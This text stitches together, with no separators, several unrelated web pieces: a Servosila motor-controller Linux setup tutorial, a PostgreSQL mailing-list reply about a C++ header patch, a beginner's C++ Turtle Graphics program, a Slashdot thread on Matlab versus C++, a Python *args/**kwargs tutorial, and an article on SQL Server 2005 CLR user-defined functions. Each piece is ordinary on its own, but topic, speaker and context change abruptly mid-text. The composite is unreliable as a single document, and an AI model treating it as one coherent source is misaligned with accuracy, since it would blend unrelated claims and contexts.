Servosila brushless motor controllers come in several form factors with either a circular or a rectangular shape. The controllers come with a set of connectors for motors and encoders as well as for USB or CANbus networks.
The controllers can be powered by a power supply unit or by a battery. To spice up my setup, I am going to use a battery to power the controllers and thus their motors. The controllers need 7 to 60 volts DC of voltage input. If I connect the battery, the controllers get powered up. The small LED light tells us that the controllers are happy with the power supply.
We need to connect the brushless motor controllers to the Linux computer. There are two ways to do that - via CANbus or via USB. Lets look at the USB option first. A regular USB cable is used. Only one of the controllers needs to be connected to a computer or a PLC.
Next, we need to build an internal CANbus network between the controllers. We are going to use a CANbus cross-cable to interconnect the controllers. Each controller comes with two identical CANbus ports that help chain multiple controllers together in a network. If one of the interconnected brushless motor controllers is connected to a computer via USB, then that particular controller becomes a USB-to-CANbus gateway for the rest of the network. Up to 16 controllers can be connected this way via a single USB cable to the same control computer or a PLC. The limit is due to finite throughput of the USB interface.
Lets plug the motors to their controllers. The simple sensorless motor has just three phase wires. The more complicated bigger motor comes with three phase wires, a ground wire, and an absolute encoder cable. For now, I will connect just the phase wires and the ground wire. The controllers come with blade terminals for connecting the motors. The terminals are designated as A, B, C and G. There are also soldering holes for the motor cables. Unplug the power supply before connecting the motors. Now, lets power up our motor controllers, and turn our attention to Debian Linux computer.
The controller connected to the computer appears to Linux as a virtual serial port. If we list all the serial devices in Linux, we shall find our controller in the list (`/dev/ttyACM0`):
```
ls -la /dev/tty*
```
The controllers use text messages to deliver telemetry data to the computer. We are going to look at the messages now. This command is supposed to display text messages that the controller sends to the computer.
```
cat /dev/ttyACM0
```
What happened is that Linux prevented us from accessing the serial port due to some default security restrictions. To lift the restrictions, we need to add the "user" account to a group called "dialout". The group lists the users who are allowed to access serial ports. You have to invoke administrative privileges to add yourself to the "dialout" group. Use the "adduser" command in Debian:
```
/usr/sbin/adduser user dialout
```
...or an equivalent "sudo usermod" command in Ubuntu:
```
sudo usermod -a -G dialout $USER
```
Linux requires you to log out and log in again for the updated security permissions to go into effect.
Lets try display telemetry messages again. It worked this time. The controller encodes telemetry in a text string. We will look into the format of the string in a separate video.
One more thing. If you plug the USB cable, and then immediately try to connect to the serial port, you may observe a "Device Busy" error. The ghost error disappears on its own in a few seconds as you keep trying to connect to the port. This issue can be fixed.
What happens is that a standard Linux program called Modem Manager, automatically connects to the serial port thus preventing you from accessing it. The simplest way to fix the problem is to uninstall the Modem Manager:
```
apt-get purge modemmanager
```
Now that we have finished configuring Linux, we can install a graphical software tool called Servoscope. Un-zip the downloaded package in your home directory. Open a terminal, and go to the directory with un-zipped files. Launch the Servoscope program by executing this shell script in the following way:
```
./servoscope.sh
```
The Servoscope program provides means to configure your brushless motor controllers, read telemetry, send commands to the controllers, plot performance charts, and so on. Pick the name of the proper serial port in the drop-down menu, and click the "Connect" button. If the port is not listed in the drop-down menu, click the "Refresh" button.
Both controllers appear in a list of devices. Double-click on a device name to open a command and configuration window. The window has a telemetry and a configuration management sections. You can monitor multiple controllers at the same time. We will look into the Servoscope software with a great detail in a separate video. At this time, you may wish to check input voltage displayed in the telemetry section.
What I am going to show next is just a demo of the controller's auto-configuration function. I suggest that you watch a dedicated video regarding the Auto-Configuration function, since this topic requires some background information. From the drop-down menu, select the Auto-Configuration command. Specify a maximum phase-to-phase electric current that your motor can handle. Specify the number of poles your motor has. Click the Send button.
The motor produces a beep sound. The sound indicates the beginning of an auto-configuration procedure. The controller sends sounding electrical signals to the motor. This way the controller measures various characteristics of the motor, and then configures itself for this particular motor. The motor makes what looks like mysterious kung-fu moves during the auto-configuration routine. The motor accelerates to its maximum speed. Be careful as the motor is producing its maximum torque at this moment. The rapid accelerations may take place a few times during the auto-configuration procedure. The second beep sound indicates the end of the auto-configuration procedure.
Now we need to repeat the routine for the smaller motor. Switch to the other window. Pick the Auto-Configuration command from the drop-down menu. Specify a maximum phase-to-phase electric current that your motor can handle. Specify the number of poles your motor has. By the way, these values normally come from the motor's datasheet. Click the Send button. This time the smaller motor produces the beep sound, and starts making the kung-fu moves.
The beauty of the Auto-Configuration function is that the controller automatically configures itself when commissioning a new motor. I suggest that you watch a separate video dedicated to the peculiarities of the Auto-Configuration routine.
Now that both controllers have been configured, I am going to send an Electronic Speed Control command to the bigger motor. Choose the Electronic Speed Control command from the same drop-down menu. I specified speed as 20 electrical revolutions per second. Hit the Send button. Note that the program sends the commands to the serial port in a text format. The motor starts spinning with the commanded speed.
That's it for now. In this video we looked at how to connect brushless motor controllers to a Linux computer via USB. We will look at CANbus interface option in a separate video. | https://habr.com/ru/post/573644/ | null | null | 1,316 | 58.28 |
On Thu, 2007-06-28 at 00:43 +0200, Jacob Rief wrote:
No objection, although it would be nice if we could find something nicer to rename "using" to than "using_". What about "using_clause" or "using_list"? You also changed "namespace" => "name_space" in builtins.h; is that necessary?

> I wrote a patch which applies cleanly onto version 8.2.4

Patches should be submitted against the CVS HEAD code: we wouldn't want to apply a patch like this to the REL8_2_STABLE branch, in any case.

BTW, I notice the patch also adds 'extern "C" { ... }' statements to a few random header files. Can't client programs do this before including the headers, if necessary?

-Neil

---------------------------(end of broadcast)---------------------------
TIP 4: Have you searched our list archives?
Hi! I'm new here.
I'm reading a book about C++ so I'm quite new to the language.
An exercise asks to write a simple "Turtle Graphics" program.
This program should be able to simulates very simple graphics thanks to the following commands:
Command Meaning
1 - Pen up
2 - Pen down
3 - Turn right
4 - Turn left
5 , n - Move forward n spaces
6 - Print 20-by-20 array
9 - End of data (sentinel)
Now, before I post my code, my questions:
- is the code clear? I'm not very happy about the two switch statements I use to decide the command and the direction (in the move function).
- I wasn't able to implement the fifth command in one line, I mean you have to write 5, ENTER and then the N. The exercise asks to do it in one line. How can I achieve that?
Thank you for any suggestion and please don't be gentle: I want to learn :)
My code:
#include <iostream>
using namespace std;

void printMap(void);
void printCommands(void);
void move(int);

const int END = 9;
const int commands[7] = { 0, 1, 2, 3, 4, 5, 6 };
int map[20][20] = { 0 };
bool penDown = false;
int x = 0;
int y = 0;
int dir = 0; // 0 = N, 1 = E, 2 = S, 3 = O

int main()
{
    cout << "Welcome to the Turtle Graphics! Here's the list of commands:" << endl;
    printCommands();

    int command;
    int args;
    cout << "Enter a command: ";
    cin >> command;
    if (command == 5)
        cin >> args;

    while (command != END)
    {
        switch (command)
        {
            // print commands
            case 0:
                printCommands();
                break;
            // pen up
            case 1:
                if (penDown)
                    penDown = false;
                else
                    cout << "The pen is already up." << endl;
                break;
            // pen down
            case 2:
                if (!penDown)
                    penDown = true;
                else
                    cout << "The pen is already down." << endl;
                break;
            // turn right
            case 4:
                dir = (dir + 1) % 4;
                cout << "The new direction is " << dir << endl;
                break;
            // turn left
            case 3:
                dir -= 1;
                if (dir < 0)
                    dir = 3;
                cout << "The new direction is " << dir << endl;
                break;
            // move forward
            case 5:
                cout << "Moving forward by " << args << endl;
                move(args);
                break;
            // show the map
            case 6:
                printMap();
                break;
        }
        cout << "Enter a command (0 to show commands): ";
        cin >> command;
        if (command == 5)
            cin >> args;
    }
    cout << "Bye bye!" << endl;
    return 0;
}

void move(int steps)
{
    while (steps-- > 0)
    {
        switch (dir)
        {
            // N
            case 0:
                if (y > 0) y--;
                break;
            // E
            case 1:
                if (x < 19) x++;
                break;
            // S
            case 2:
                if (y < 19) y++;
                break;
            // O
            case 3:
                if (x > 0) x--;
                break;
        }
        if (penDown)
            map[y][x] = 1;
    }
}

void printMap()
{
    for (int i = 0; i < 20; i++)
    {
        for (int j = 0; j < 20; j++)
        {
            if (x == j && y == i)
                cout << "X";
            else if (map[i][j] == 0)
                cout << " ";
            else
                cout << "*";
        }
        cout << endl;
    }
}

void printCommands()
{
    cout << "0 - Show the commands available\n"
         << "1 - Turn up the pen\n"
         << "2 - Turn down the pen\n"
         << "3 - Turn left\n"
         << "4 - Turn right\n"
         << "5, n - Move forward n tiles\n"
         << "6 - Show the drawing\n"
         << "9 - Exit program" << endl;
}
Managing Parallel Development in Two Languages? 108
Abhaga asks: "I work for a technology startup and our research work is mostly done in Matlab. The technology has matured, and now we are looking to build prototypes and products in C++. However, the dilemma is about the further research work/enhancements to the system. Should they be done in Matlab and continuously ported to C++, or is it better to move to C++ once and for all, at this point of time? Anyone having experience with similar things, what should we keep in mind while deciding on one or other."
Ruby is worse (Score:1, Funny)
No, *THE* language for zealots today is Ruby. With a syntax that makes Perl seem easy and Fortran modern, a complexity that makes C++ seem simple, features of an uselessness that make Lisp seem practical, zealots are all abandoning Python for Ruby these days.
Re:Ruby is worse (Score:2)
---
Help me with my Ruby Sudoku Solver [markbyers.com]
Re:Ruby is worse (Score:2)
Probably stuff like
def r a;!(i=a=~/0/)?p(a):((?1..?9).map-(0..80).map{|j|a[ j]+(i-j)%9*
(i/9^j/9)*(i/27-j/27|i%9/3-j%9/3)*9}).map{|k|r$`
has something to do with people being turned off by Ruby... Besides, can't you write the same program in a shorter way using APL?
If you want to obfuscate, at least you should try to do it in a beautiful and elegant way, like this Perl program. [99-bottles-of-beer.net]
Who said anything about obfuscation? (Score:2)
I don't think so otherwise someone would have submitted it.
If you want to obfuscate
I don't. The idea was to make it as short as possible, not as unreadable as possible. If I wanted to make it unreadable, I'd use Perl, like you suggested.
Re:Ruby is worse (Score:3, Interesting)
Give me a break. Nobody writes Ruby that way.
Ruby is far from perfect, and it's not for everyone, but that can be said for any language. You could at least try to criticize it for its faults, not some guy who programs like a moron.
OMFG!!!1 C is a bastardization. Only crazy zealots program in C, cause they're always doing stuff like this [ioccc.org] or this. [ioccc.org] You'd have to be a zealot to use C!
See how stupid that looks?
Re:Ruby is worse (Score:2)
Re:Ruby is worse (Score:1)
Only zealots would respond to an obvious troll n/m (Score:1)
Re:Only zealots would respond to an obvious troll (Score:1)
Mathworks already went with Java (Score:3, Interesting)
Matlab is morphing into a Java scripting language. You know why the Matlab UI takes so long to load these days? Its written in Java, so it needs to load a Java VM when it launches with all of the attendant byte code checking of loaded classes.
Did you know that you can launch Java apps from the Matlab command prompt? That you can also create object instances of individual Java classes and invoke function calls on them? That Matlab automatically m
Do one thing at a time. (Score:2, Insightful)
Trying to write C++ code and develop the math at the same time means that you have four times the trouble debugging. If you have a problem you won't be sure whether it's in the math or the code. If you get the math right first, you
Re:Do one thing at a time. (Score:2)
Actually, if functional units are done in sequence, then the debugging in the second language will be trivial. After writing, testing, and debugging the Foo function in Matlab, the C++ work will be little more than transcription.
If you can interface Matlab to C++, you can even use the same tests for both codebases.
Re:Do one thing at a time. (Score:2)
Start High, Then Low (Score:4, Insightful)
Start in whatever language happens to be easiest/most high level. Easiest in that whatever helps you express your final product the fastest. Then, when this prototype is up and running, go ahead and reprogram it in C++ for speed.
Think of using the first language as a roadmap, where you can concentrate on organizing your thoughts and getting user requirements out of the way. Done purely in C++, you may be subject to premature optimization or just wasting time re-inventing constructs and concepts that are trivial in the other language.
Re:Start High, Then Low (Score:2)
Re:Start High, Then Low (Score:2)
Elegant code reduces development time.
Are you calling GNU code elegant ?
No-one I know that has to cope with GNU code would call it elegant.
Re:Start High, Then Low (Score:2)
Re:Start High, Then Low (Score:3, Informative)
Are you calling GNU code elegant ? No-one I know that has to cope with GNU code would call it elegant.
What GNU code do you mean? There are many official GNU projects, some very elegant, some rather crufty, most a mixture of both. Your comment makes no sense.
Proprietry lock-in (Score:1)
Well, starting out developing using a proprietry environment such as Matlab is not the smartest move if it's so easy to implement your code in C++. What happens if TheMathWorks double their licensing fee? Triple it? Go bust?
Using a properly-defined (ie. by an ISO/IEC standard) language is a much smarter thing to do. Choosing one with several available compilers, supported on different OS / CPU platorms helps too.
Try to make your project as independant as possible, and it will stand a much better chanc
Re:Proprietry lock-in (Score:1)
Re:Proprietry lock-in (Score:4, Interesting)
If you can save time by using Matlab, even in your very unlikely scenario, the extra cost of the software is still dwarfed by the cost of programmers time as well as the potential losses of being 2nd to market. Unless the software is prohibitively expensive(which Matlab isn't), you need to go with what can get the job done the fastest with the fewest errors.
Re:Proprietry lock-in (Score:5, Interesting)
So that is $5,000 a Year of software cost. Now the programmer will work a 35 hour work week. Now the Cheap Programmer year cost is $26,250 a year and the expensive programmer $262,500 a year. So programmers are more expensive then licenses. So if this tool can make a programmer twice as productive then it is worth the license. So unless the programmer is getting like $3.00 an hour which is less then most outsourcing. The costs to do it in C++ vs. Paying for a license is worth it.
Re:Proprietry lock-in (Score:2)
That's only true if they're developing for their own in-house work. But if they're trying to sell this product to other people, going the Matlab route just took $10,000 off their margin. If they want to make a profit, they need to sell their product for $10,000 + [developer time per unit] + [desired profit].
If they go the c++ route, they only have to sell it for [developer time per unit] + [desired profit]. The developer time might be more, but with the lower price, they have a better chance of selling m
Re:Proprietry lock-in (Score:1)
It's not circular. One cost is sunk and the other is variable. If they sell more copies they can more easily amortize the sunk cost and actually, you know, make real long term profit.
Re:Proprietry lock-in (Score:2)
In my (possibly incorrect) view, the choice seemed to be to develop using matlab and spend less time developing, or to develop in C++ and spend more time developing. I was saying that it may be cheaper on a per-unit basis to pay the develo
Re:Proprietry lock-in (Score:3, Insightful)
Re:Proprietry lock-in (Score:2)
Here's the price sheet:
RIGHT NOW, the single-copy United States price for Matlab for commercial use is $1900. The various add-on toolboxes cost anywhere from a few hundred dollars to several thousand dollars.
Those are ONE-TIME purchase prices, not annual license fees. Annual maintenance contracts, which get you upgrades as they become available, are typically around 1/5 of the purchase
Re:Proprietry lock-in (Score:1)
Your proprietry English that contains "independant" will probably go out of business and you will wither and perish.
Re:Proprietry lock-in (Score:1)
Re:Proprietry lock-in (Score:1)
GNU Octave (Score:2)
Depending on how you're using it, you could replace Matlab with GNU Octave [octave.org].
Avoiding proprietary dependencies (especially expensive ones like Matlab) is generally a good idea.
The myth of lock-in (Score:2)
Here at
Moving from one product to another is alwais costly, the cost of the licences is normally not relevant. Actually in most cases (exceptions exist, so annedotal evidence of e opposite can be presented) these costs are actually not significant.
Don't worry about the lock in, do worry about what a product can do for you.
Re:The easy way (Score:2, Informative)
Re:The easy way (Score:4, Insightful)
octave 2.9 is pretty awsome. We use it (for solving a lot of Lp problems, with some branch-and-bound), and it works beautiful.
As for the question... I would question the wisdom in abandoning octave (or matlab) at all, but if you do need to do it, do it in small steps. At least, that is the best way in my experience.
Re:The easy way (Score:2)
This should have read, "So it won't be either faster or (much) easier." This could be rewritten in ways providing a choice between "either/or" or "neither/nor" but "nor/nor" doesn't make sense. There is also the misuse of "a lot" to mean either many or much.
My own imperfect skills in grammar were not drilled into me by nuns with their rulers
Can you do modules in Matlab? (Score:1)
See whether Matlab provides something like that. If it does not., you'll be wasting a lot of time converting it all to C++ and then continuing research on a C++ base., which means half your R&D team would have to be re-educated.- November/016220.html [python.org]
The above link should be o
Re:Can you do modules in Matlab? (Score:1)
Yes you can do this, I believe you can even call MATLAB routines from within this code. The question is, is worth it. Unless you really have multiple ways of using the same code in different ways (say an ode solver) then you just end up with one big function written in C++ and the trival code to call this function in MATLAB.
Software wants to be free (Score:3, Funny)
Choose one language for development. (Score:5, Interesting)
Political: Undoubtedly you will get some changes and fixes that are really easy in one language and a real pain for an other one. So say it takes 5 Minutes in MatLab and could take a week in C++or Vice Versa. Most people don't get this fact especially non professional programmers. So one side group will get a fast change and the other will get the slow change. Thus makes the other group feel like their side isn't as well supported thus making you look really bad.
Business: Maintaining the application will always require people with skill sets in both. Matlab is a rather uncommon skill set while as of right now C++is fairly common. But finding people willing to do both is much harder. As time goes on and as one language leaves common use finding people with these skill sets combined will be very hard and expensive to keep.
Technical: Reported bugs will be need to check on both systems and bug will appear in one system and not the other. But when a bug is reported you will need to check on both systems. And sometime you can easily fix on system and the other requires a major rework. Getting performance on one system to be equivalent to the other will be difficult.
I think you are about to enter a quagmire which you will not come out looking good in. If you do succeed you will probably get a neutral reaction to you work. So it is a Loose/Tie situation. I would spend more time descussing other options. Going one way or the other. Not 2 products that do the same thing but differently.
Re:Choose one language for development. (Score:2, Informative)
Re:Choose one language for development. (Score:2)
It seems that unless Matlab has some sort of relatively cheap VM for their code (don't think they do) then this company should just switch to C++ right way if they want to release a product and make money off of it. But I don't think that's the right answer. You mentioned how there will be different bugs and how one group will get a fast change and the other will get a slow c
This situation has its own advantages (Score:2)
Utilizing two languages in the development process guarantees that however complete the Matlab version is, you still require a port over to C++. This becomes a natural opportunity to refactor and re-analyze the original work as you proceed to your final draft.
What's astonishing to me is that your management seems to tolerate you writing the application twice. If that's really so, please tell me where to contact you
Why do this at all? (Score:5, Insightful)
the Matlab code have a facility with Matlab and are subject matter experts that are doing the heavy lifting (algorithmically speaking). Are the C++ coders the same people? If they're not, can you afford to spend the time/staff to do the porting? Should the
original code even be in Matlab in the first place?
You can call matlab libraries from C++ code, which would seem to be the best of both worlds. Then you wouldn't have to port anything.
Lastly, this is not the kind of question that will get answered well on Slashdot. People who have never used matlab will make assumptions and not understand that it is very unlikely that C++ will have the kind of simulation and and capabilities that Matlab does. Besides, a lot of the time Matlab people (scientists, engineers, quants, etc) may be comfortable working Matlab but not C++, so you do what you can to make it possible for them to work. Also, the suggestion that Mathworks will raise pricing and hold your work hostage is laughable: They already do that, their pricing is crazy.
Re:Why do this at all? (Score:1, Insightful)
You have to realize that the speed at which the developement team works will break in significantly once they start to migrate to c++ (and it will stay below the former speed !!). Matlab is a very powerful tool when it comes to numerical tasks or data evaluation. It is also very forgiving regarding "quick a
Re:Why do this at all? (Score:1)
Unless you want to distribute your application to people who don't have MATLAB. Or is the MATLAB runtime engine [mathworks.com] free to distribute?
Re:Why do this at all? (Score:2)
Absolutely correct. Coincidentally, yesterday at the bookstore I saw a book on network programming in Matlab, which was a big surprise (to my non-Matlab-using mind).
Re:Why do this at all? (Score:2)
This has to be done because not everyone is a scientist with an experimental, discovery mindset. Everyone is also not a C++ programmer (or Java, Perl, C, C#, etc.) and thus proficient at error checking and dealing with a variety of system interaction. Face it, people hire scientists to develop things no one else is doing, but who learned programming as a necessary evil. People hire professional developers to glue or reform that prototype effort into something a customer wants. I found that my college tr
Compile the Matlab (Score:4, Informative)
Re:Compile the Matlab (Score:2)
Many of the built in functions in Matlab are coded in eg C. And as you mention Matlab even has built in functionality for porting code to C from the Matlab scripting language.
I'd advice the OP to go that route. Profile your code and begin by moving over the parts that are eating the majority of your cycles. Design it similar to the
Once
Do it in C++ from the start (Score:3, Interesting)
However, having said that, I must say that I *do* write small prototypes first, only I do it in C rather than other languages. I also use plenty of small scripts, mostly in Perl, to perform auxiliary operations. But the main code that constitutes the algorithms used in the program should be prototyped as close to the end code as possible. There is no way you could develop an algorithm in Matlab or Python or Ruby and consider its testing a validation for a deliverable program written in C++.
Re:Do it in C++ from the start (Score:1)
No offensive, but if the maths your doing is easier than writing a ui then you are either doing very simple maths or very complicated user interfaces!
Seriously, if you're implementing an algorithm to solve a 2nd order differential equation using the finite element method or using the shooting
Re:Do it in C++ from the start (Score:5, Insightful)
Hard? Only if you cannot or don't want to use existing libraries for C++ [diffpack.com]. Now try to find a pre-packaged solution for "they want a button for downloading the data in the same dialog that lets them open an Excel spreadsheet" or any of the infinite other changes one always gets to do in any non-trivial GUI.
Re:Do it in C++ from the start (Score:2)
No offensive, but if the maths your doing is easier than writing a ui then you are either doing very simple maths or very complicated user interfaces!
There are lots of people here who do math/science for a living who disagree with this. Nobody codes algorithms they don't understand, and coding algorithms you undertsand well is trivial in most general purpose languages that include math libraries. Really.
It depends on what you're developing (Score:2)
Develop the algorithms in matlab. Develop the UI in C++. Use matlab to create loadable modules that can be called from your C++ program.
Matlab is not ideal for developing the UI. C++ is not ideal for developing math algorithms.
Beyond that, do what makes sense for your program and developers.
-Adam
Bass ackwards (Score:2)
I would do the UI in Matlab or at least keep the UI in Matlab because that is what the dude probably has. The thing to migrate the UI part in is Java Swing -- you can incorporate custom Java Swing widgets into a Matlab GUI.
Re:Bass ackwards...actually, retrograde (Score:1)
Use ITPP C++ library which maps perfetly to matlab (Score:2, Informative)
Been there, Done That... (Score:4, Insightful)
I would continue to develop algorithms in Matlab, and use the Matlab compiler to move the algorithms to C++ for integration with the C++ "presentation layer" code. Then compile and ship an all-C++ product.
Drop Matlab (Score:1)
We need more information (Score:2)
I don't see how to give a meaningful answer to the general questions asked here without some more context.
For what it's worth, I write high-performance, somewhat high-level maths libraries in C++ for a living. You can do a lot of things more easily in C++ than some people would expect, particularly if you have access to the right libraries (someone already mentioned diffpack, and there are also ports of BLAS and LAPACK for linear algebra, and many others). Of course a dedicated tool will usually be better
Re:We need more information (Score:2)
sqrt(x * x + y * y)
Not sure how many ways there are to do that unless you roll your own sqrt() function.
Care to expand on it?
Re:We need more information (Score:2)
That's exactly not the way to do it: consider what happens if one of x and y is much greater than the other, as for example if you have a vector very slightly misaligned with the x- or y-axis.
To avoid this problem, you can rearrange as x*sqrt(1+(y/x)*(y/x)), or the same but pulling y out, depending on which is bigger. (In practice you'd calculate y/x only once, of course.)
Re:We need more information (Score:2)
obviously calculating the subtractions first. And for 3D you just add in "+ (z2 - z1) * (z2 - z1)".
Not sure why you need to re-arrange the equation especially since the normal version
contains 2 subtractions and 2 multiplications whereas yours contains 1 division, 2 mults
and 1 addition. Can't see how that would be faster.
Re:We need more information (Score:2)
Speed isn't the point; accuracy is. I'm afraid I don't have time right now to explain the details, but please refer to a good textbook such as Numerical Recipes and you'll find all the background there.
Re:We need more information (Score:2)
Re:We need more information (Score:2)
Pythagoras is accurate. A naive numerical implementation is not.
You know, this whole discussion is exactly what I was talking about when in my original post I wrote:
Re:We need more information (Score:2)
Re:We need more information (Score:2)
The point isn't whether division is more accurate than multiplication under normal circumstances, it's the vulnerability to destructive overflow/underflow. If that happens, doing things the naive way will be very much less accurate than a proper implementation based on the alternative approach I gave.
Really, this is elementary stuff. The fact that you keep missing the point doesn't mean there isn't a point, it just means you're not sufficiently familiar with the field to understand the danger. Please go a
Re:We need more information (Score:2)
FYI I do 3D graphics programming so I do have a clue about this but I guess we'll just have to agree to disagree.
Re:We need more information (Score:2)
I could have guessed that: your focus throughout this discussion has been on speed rather than accuracy. That's fair enough in your line of work, but not really relevant to this debate, where "serious" maths appears to be the order of the day.
We'll obviously have to agree to disagree on this one, so I leave you with one final thought: if you're not missing anything and I'm the one who doesn't understand, then why does Numerical Recipies in
Don't drop MATLAB (Score:4, Interesting)
Re:Don't drop MATLAB (Score:2)
I have to agree with this statement. Of course, it all depends on the kind of math you are doing. In general, MATLAB is better for prototyping new math-intensive algorithms (e.g. matrix math) and it might make sense to have
Do the Prototype then Drop Matlab (Score:1)
I would agree with the statement that the prototype algorithms could be completed in Matlab. If you do that, then complete the algorithm development in Matlab. You really don't want to switch languages mid-way through algorithm development.
The practical problem that I have seen more than once, in a research situation, is that the researchers try to complete the application in Matlab. The result is usually a disaster for a full-fledged high-performance application. Matlab does math well, but other th
Compiler (Score:2)
Similar Situation (Score:5, Insightful)
Re:Similar Situation (Score:3, Insightful)
Then Matlab must have improved a lot since I last used it (Version 4). A problem I had was that matrices were well behaved with small test cases, but became ill conditioned when we used actual worki
Re:C++ (Score:3, Insightful)
Good question. I'll answer that if you answer this: every time I get to a street intersection, should I turn right, turn left, or go straight ahead? The answer to both is: it depends. Where do you want to go? If the argument is a basic type that will not be changed, use a value, if it needs to be changed, use a reference, if it's a large structure or array, use a pointer.
A language that ignores
Re:C++ (Score:2)
It's funny, because I think pointers are essential to programming. That's because in my software projects I usually start with a sketch of the data structures. I draw in a piece of paper all the structures (or "tables" as the database people like to call them). Then I draw the relationships among those structures, by drawing lines with arrowheads from one structure to another. That way it's immediately ob
Matlab's prices (Score:2)
Depends on Program Complexity (Score:1)
Free Matlab work-alikes? (Score:2)
There are alternatives to Matlab that are similar, and can be resold in commercial
apps without any license or royalty issues.
I would personally use Python / NumPy & SciPy / Matplotlib in a heartbeat. There are even
tutorials for people who are used to Matlab on the subtle syntax differences.
You can even use SWIG (or Boost_python) to integrate your high level code with your
low level code in the same application. You can then distribute the result on
Windows, Mac or Linux with different bundling or freezi
Prototype in one language first (Score:1)
It also allows you to ensure that the prototype is rewritten when being implemented. It is not often that prototype design choices are the best for production, so needing to port guarantees that all code is revised, and you have a working implementation to give test results that the product sho
keep 2 languages (Score:1)
a math-centric or faff-minimising prototyping environment is crucial whilst constructing the math models which you'll later be putting into Production. you want to absolutely minimise the Drag of the tool on the thought process. you can use MatLab or Excel or a piece of paper.
then take the result as being the Specification (Logical) which will feed into your development. your Production-ready code's particular Phys
Prototype in the most straightforward language (Score:1)
This sounds like a reasonable prototyping/porting approach, really. I do much the same thing. For several years, I've been working on a programming language/calculating tool called Frink [futureboy.us], and when I'm trying to write new code that may eventually be part of Frink, say, efficiently calculating the Riemann Zeta function, or factoring large numbers, I'll usually first write the prototype function in the Frink language itself, and get it working. It's much less effort, and usually far more legible, to write | https://slashdot.org/story/06/07/20/2342227/managing-parallel-development-in-two-languages | CC-MAIN-2016-44 | refinedweb | 4,582 | 62.07 |
Introduction
People who are new to Python programming find it hard to understand two types of function arguments it provides namely *agrs and **kwargs. Let me be clear about one thing, you need not necessarily name those arguments as by the same name as above (args and kwargs) you can name that argument as your choice(eg- *agr, *agrs) what is important is that asterisk(*) symbol.
Note: for demonstration, I will be using Jupyter Notebook
*args in Python with examples
Example 1
def fun(*args): print(args) fun(1,2,3,4,5,'5.5', "rs")
Output:
(1, 2, 3, 4, 5, '5.5', 'rs')
Using *args we can give as many inputs as we want, but keeping in mind that arguments must be non-keyworded arguments function that uses *agrs(*any_name_by_user) returns all the values in a tuple.
Example 2
def fun(*args): print(args) fun(1,2,3,4,5,'5.5', name = "rajesh")
When you run this code you got an error like this:
Output:
--------------------------------------------------------------------------- TypeError Traceback (most recent call last) <ipython-input-14-3e9b260b8436> in <module> 1 def fun(*args): 2 print(args) ----> 3 fun(1,2,3,4,5,'5.5', name = "rajesh") TypeError: fun() got an unexpected keyword argument 'name'
Here you pass key and value which is not supported by *args argument
Use case of *args
Let’s say we have a function that adds up the numbers passed as arguments but the number of arguments totally depends on the user.
How can we do that?
⇒ The answer is simply using *args in a function.
def add(*args): result = sum(args) print(result) add(1,2,3,4,5) add(1,2,3,4,5,6,7,8,9,10.5)
Output:
15 55.5
In the above function, at first, we pass five arguments, and the second time we pass ten arguments.
Here in this case function handles no matter how many numbers are passed as arguments and return sum as the result.
**kwargs in Python with examples
Using *agrs we are unable to give keyworded arguments what if we wanted to give keyworded arguments there where **kwargs comes into the picture.
def fun(**kwargs): print(kwargs) fun(name="shiv", age=22, faculty="computer")
{'name': 'shiv', 'age': 22, 'faculty': 'computer'}
Note: Function with **kwargs returns values as a dictionary.
To access the values inside the function
# to access the values def fun(**kwargs): for key, values in kwargs.items(): print(f"key: {key} , value: {values}") fun(name="shiv", age=22, faculty="computer")
Output:
key: name , value: shiv key: age , value: 22 key: faculty , value: computer
Use case of **kwargs
Let’s say we want to store the information of a student(name, id, age, address, phone number) using only one function. So, is it possible to do that? The answer is yes using **kwargs.
def student_info(**kwargs): print(kwargs) student_info(name="Shiv Shrestha",id = 10, age = 22, address="Nepal", ph_no = 9800000000 )
Output:
{'name': 'Shiv Shrestha', 'id': 10, 'age': 22, 'address': 'Nepal', 'ph_no': 9800000000 }
Mostly the use of *args and **kwargs is in the Python decorator.
Conclusion
In Python, concepts of *args and **kwargs are important for programmers. *args is used in a function that accepts non-keyworded arguments and **kwargs is used in a function whose task is to accept the keyworded arguments.
The first one returns the accepted values in the form of tuple and the latter one returns the accepted values in the form of a dictionary.
For more information follow this link
Happy Learning:-) | https://pythonsansar.com/args-and-kwargs-python/ | CC-MAIN-2022-27 | refinedweb | 585 | 59.33 |
Implement User-defined Functions in SQL Server 2005 with Managed Code
Implementation of the User-Defined Function
For the purposes of this example, create a new table whose declaration looks like the following:
CREATE TABLE Users(ID int, Name Varchar(50))
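The function below looks users up by ID, so the table needs at least one row before there is anything to return. A minimal seed script (the IDs and names here are arbitrary sample values, not part of the original example):

```sql
-- Sample rows for testing; the IDs and names are arbitrary.
INSERT INTO Users (ID, Name) VALUES (1, 'Alice Example');
INSERT INTO Users (ID, Name) VALUES (2, 'Bob Example');
```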
In the user-defined function, you return the name of the user based on the user's supplied ID. To create this function, select Project->Add User-Defined Function from the menu and specify the name of the user-defined function file as GetUserNameByID.cs. Once the file is created, modify the code in the class to look like the following:
using System;
using System.Data;
using System.Data.Sql;
using System.Data.SqlServer;
using System.Data.SqlTypes;

public partial class UserDefinedFunctions
{
    [SqlFunction]
    public static SqlString GetUserNameByID(int id)
    {
        SqlCommand cmd = SqlContext.GetCommand();
        cmd.CommandText = "SELECT Name FROM Users WHERE ID = " + id.ToString();
        SqlDataRecord rec = cmd.ExecuteRow();
        string name = rec.GetString(0);
        return name;
    }
};
The following two lines of code should look familiar to developers who have written client applications that use the types found in the System.Data.SqlClient namespace:
cmd.CommandText = "SELECT Name FROM Users WHERE ID = " + id.ToString();
SqlDataRecord rec = cmd.ExecuteRow();
The command text is specified by setting the CommandText property of the SqlCommand object returned by the call to SqlContext.GetCommand. Next, the ExecuteRow method of the SqlCommand object is called, which returns a value of type SqlDataRecord. SqlDataRecord is a new type introduced in ADO.NET 2.0 that represents a single record from the database. Once you have the record, you can then read its first string column by calling GetString(0).
Now that you've created the user-defined function, you can build and deploy it using Visual Studio 2005. Once the deployment is completed, you can then test it, which the next section covers.
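Visual Studio 2005 automates deployment, but the same registration can be done by hand from a query window. The sketch below assumes CLR integration has not yet been enabled and uses placeholder names and paths (the assembly name and DLL path must match wherever your project actually builds):

```sql
-- Enable CLR integration (it is off by default in SQL Server 2005).
EXEC sp_configure 'clr enabled', 1;
RECONFIGURE;
GO

-- Register the compiled assembly. The path and assembly name below are
-- placeholders for your project's actual output DLL.
CREATE ASSEMBLY UDFExamples
FROM 'C:\Projects\UDFExamples\bin\UDFExamples.dll'
WITH PERMISSION_SET = SAFE;
GO

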